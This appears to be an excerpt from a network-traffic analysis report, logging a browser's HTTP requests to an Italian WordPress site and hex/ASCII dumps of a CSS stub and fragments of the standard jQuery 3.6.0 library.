2025-01-09 12:19:22 UTC	707	IN	Data Raw: 2f 2a 20 48 61 76 65 20 66 75 6e 20 61 64 64 69 6e 67 20 79 6f 75 72 20 73 74 79 6c 65 20 68 65 72 65 20 3a 29 20 2d 20 50 53 3a 20 41 74 20 61 6c 6c 20 74 69 6d 65 73 20 74 68 69 73 20 66 69 6c 65 20 73 68 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 61 20 63 6f 6d 6d 65 6e 74 20 6f 72 20 61 20 72 75 6c 65 2c 20 6f 74 68 65 72 77 69 73 65 20 6f 70 65 72 61 20 6d 69 67 68 74 20 61 63 74 20 62 75 67 67 79 20 3a 28 20 2a 2f 0a 0a 2f 2a 20 47 65 6e 65 72 61 6c 20 43 75 73 74 6f 6d 20 43 53 53 20 2a 2f 0a 0a 0a 0a 0a 2f 2a 0a 44 65 73 6b 74 6f 70 20 53 74 79 6c 65 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 2f 2a 20 4e 6f 74 65 3a 20 41 64 64 Data Ascii: /* Have fun adding your style here :) - PS: At all times this file should contain a comment or a rule, otherwise opera might act buggy :( // General Custom CSS //Desktop Styles================================================== // Note: Add

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:22 UTC	570	OUT	GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:23 UTC	277	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:22 GMT Content-Type: text/javascript Content-Length: 89521 Connection: close Last-Modified: Sun, 11 Sep 2022 14:12:18 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:23 UTC	16107	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-01-09 12:19:23 UTC	16384	IN	Data Raw: 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 26 26 72 5b 32 5d 2c 61 3d 73 26 26 63 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 73 5d 3b 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 Data Ascii: l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1])&&r[2],a=s&&c.childNodes[s];while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if(1===a.nodeType&
2025-01-09 12:19:23 UTC	16384	IN	Data Raw: 6d 28 72 29 7c 7c 28 61 3d 21 30 29 2c 6c 26 26 28 61 3f 28 74 2e 63 61 6c 6c 28 65 2c 72 29 2c 74 3d 6e 75 6c 6c 29 3a 28 6c 3d 74 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 2e 63 61 6c 6c 28 53 28 65 29 2c 6e 29 7d 29 29 2c 74 29 29 66 6f 72 28 3b 73 3c 75 3b 73 2b 2b 29 74 28 65 5b 73 5d 2c 6e 2c 61 3f 72 3a 72 2e 63 61 6c 6c 28 65 5b 73 5d 2c 73 2c 74 28 65 5b 73 5d 2c 6e 29 29 29 3b 72 65 74 75 72 6e 20 69 3f 65 3a 6c 3f 74 2e 63 61 6c 6c 28 65 29 3a 75 3f 74 28 65 5b 30 5d 2c 6e 29 3a 6f 7d 2c 5f 3d 2f 5e 2d 6d 73 2d 2f 2c 7a 3d 2f 2d 28 5b 61 2d 7a 5d 29 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 55 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 58 28 Data Ascii: m(r)\|\|(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(S(e),n)})),t))for(;s<u;s++)t(e[s],n,a?r:r.call(e[s],s,t(e[s],n)));return i?e:l?t.call(e):u?t(e[0],n):o},_=/^-ms-/,z=/-([a-z])/g;function U(e,t){return t.toUpperCase()}function X(
2025-01-09 12:19:23 UTC	16384	IN	Data Raw: 6f 63 28 65 29 29 29 66 6f 72 28 61 3d 76 65 28 63 29 2c 72 3d 30 2c 69 3d 28 6f 3d 76 65 28 65 29 29 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 73 3d 6f 5b 72 5d 2c 75 3d 61 5b 72 5d 2c 76 6f 69 64 20 30 2c 22 69 6e 70 75 74 22 3d 3d 3d 28 6c 3d 75 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 3f 75 2e 63 68 65 63 6b 65 64 3d 73 2e 63 68 65 63 6b 65 64 3a 22 69 6e 70 75 74 22 21 3d 3d 6c 26 26 22 74 65 78 74 61 72 65 61 22 21 3d 3d 6c 7c 7c 28 75 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3d 73 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 29 3b 69 66 28 74 29 69 66 28 6e 29 66 6f 72 28 6f 3d 6f 7c 7c 76 65 28 65 29 2c 61 3d 61 7c 7c 76 65 28 63 29 2c 72 3d 30 2c 69 3d 6f 2e 6c 65 6e Data Ascii: oc(e)))for(a=ve(c),r=0,i=(o=ve(e)).length;r<i;r++)s=o[r],u=a[r],void 0,"input"===(l=u.nodeName.toLowerCase())&&pe.test(s.type)?u.checked=s.checked:"input"!==l&&"textarea"!==l\|\|(u.defaultValue=s.defaultValue);if(t)if(n)for(o=o\|\|ve(e),a=a\|\|ve(c),r=0,i=o.len
2025-01-09 12:19:23 UTC	16384	IN	Data Raw: 2e 73 65 6c 65 63 74 65 64 2c 28 74 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 76 61 6c 75 65 3d 22 74 22 2c 74 74 2e 74 79 70 65 3d 22 72 61 64 69 6f 22 2c 79 2e 72 61 64 69 6f 56 61 6c 75 65 3d 22 74 22 3d 3d 3d 74 74 2e 76 61 6c 75 65 3b 76 61 72 20 63 74 2c 66 74 3d 53 2e 65 78 70 72 2e 61 74 74 72 48 61 6e 64 6c 65 3b 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 24 28 74 68 69 73 2c 53 2e 61 74 74 72 2c 65 2c 74 2c 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 72 65 6d 6f 76 65 41 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 2e 72 65 Data Ascii: .selected,(tt=E.createElement("input")).value="t",tt.type="radio",y.radioValue="t"===tt.value;var ct,ft=S.expr.attrHandle;S.fn.extend({attr:function(e,t){return $(this,S.attr,e,t,1<arguments.length)},removeAttr:function(e){return this.each(function(){S.re
2025-01-09 12:19:23 UTC	7878	IN	Data Raw: 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 43 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 65 29 7b 7d 7d 3b 76 61 72 20 42 74 3d 7b 30 3a 32 30 30 2c 31 32 32 33 3a 32 30 34 7d 2c 24 74 3d 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 3b 79 2e 63 6f 72 73 3d 21 21 24 74 26 26 22 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 22 69 6e 20 24 74 2c 79 2e 61 6a 61 78 3d 24 74 3d 21 21 24 74 2c 53 2e 61 6a 61 78 54 72 61 6e 73 70 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 6f 2c 61 3b 69 66 28 79 2e 63 6f 72 73 7c 7c 24 74 26 26 21 69 2e 63 Data Ascii: .getClientRects().length)},S.ajaxSettings.xhr=function(){try{return new C.XMLHttpRequest}catch(e){}};var Bt={0:200,1223:204},$t=S.ajaxSettings.xhr();y.cors=!!$t&&"withCredentials"in $t,y.ajax=$t=!!$t,S.ajaxTransport(function(i){var o,a;if(y.cors\|\|$t&&!i.c